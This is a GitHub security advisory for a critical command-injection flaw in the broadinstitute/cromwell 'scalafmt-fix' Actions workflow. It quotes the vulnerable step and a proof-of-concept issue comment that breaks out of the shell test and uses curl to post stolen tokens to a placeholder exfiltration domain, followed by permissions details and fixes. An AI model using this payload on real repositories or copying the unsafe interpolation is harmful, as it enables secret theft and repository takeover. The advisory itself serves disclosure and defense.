Skip to content

Cromwell GitHub Actions Secrets exfiltration via `Issue_comment`

Critical severity GitHub Reviewed Published May 27, 2025 in broadinstitute/cromwell • Updated May 28, 2025

Package

actions broadinstitute/cromwell (GitHub Actions)

Affected versions

>= 87, < 90

Patched versions

90

Description

Summary

Using Issue_comment on .github/workflows/scalafmt-fix.yml an attacker can inject malicious code using github.event.comment.body. By exploiting the vulnerability, it is possible to exfiltrate high privileged GITHUB_TOKEN which can be used to completely overtake the repo since the token has content privileges. In addition ,it is possible to exfiltrate also the secret:

  • BROADBOT_GITHUB_TOKEN

Details

The Issue_comment in GitHub Actions might be an injection path if the variable isn't handle as it should. In the following step it's vulnerable because it directly interpolates untrusted user input into a shell script.

      - name: Check for ScalaFmt Comment
        id: check-comment
        run: |
          if [[ "${{ github.event_name }}" == "issue_comment" && "${{ github.event.comment.body }}" == *"scalafmt"* ]]; then
            echo "::set-output name=comment-triggered::true"
          else
            echo "::set-output name=comment-triggered::false"
          fi

In this case, it is possible to exfiltrate GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secrets.

PoC

To exploit the vulnerability an attacker can just drop a comment to any issue formed in the following way to exploit the vulnerability in the workflow .github/workflows/update_pylon_issue.yml.

test" == "test" ]]; then
  & curl -s -d "$B64_BLOB" "https://$YOUR_EXFIL_DOMAIN/token" > /dev/null #

To prove this is possible, we created an issue and we added a comment with the malicious code to extract the GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secret. With the GITHUB_TOKEN extracted we were able to push a new poc tag which has been deleted after a couple of minutes.

Screenshot 2025-05-20 at 23 17 14

Impact

Usually with GITHUB_TOKEN and write permissions, an attacker is able to completely overtake the repo.

GITHUB_TOKEN Permissions
  Actions: write
  Attestations: write
  Checks: write
  Contents: write
  Deployments: write
  Discussions: write
  Issues: write
  Metadata: read
  Models: read
  Packages: write
  Pages: write
  PullRequests: write
  RepositoryProjects: write
  SecurityEvents: write
  Statuses: write

We also checked BROADBOT_GITHUB_TOKEN permission to check if we could move laterally to org level. In this case the token seems scoped to this specific repo but it gives an attacker persistence without the need of a valid GITHUB_TOKEN.
We suggest to rotate the BROADBOT_GITHUB_TOKEN token asap.

Fix

  • Avoid directly interpolating untrusted user input into a shell script. Use GitHub Actions input context safely like:
- name: Dump comment
  run: echo "Comment Body: $BODY"
  env:
    BODY: ${{ github.event.comment.body }}

This safely passes the comment as an environment variable rather than interpolating it in-place.

  • Scope GIHTUB_TOKEN permissions to just what the actions needs to do. In this case, if it's specific for issues:
permissions:
  issues: write

Kindly reported by @darryk10 @AlbertoPellitteri @loresuso

References

@aednichols aednichols published to broadinstitute/cromwell May 27, 2025
Published to the GitHub Advisory Database May 28, 2025
Reviewed May 28, 2025
Last updated May 28, 2025

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

EPSS score

Weaknesses

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-phf6-hm3h-x8qp

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.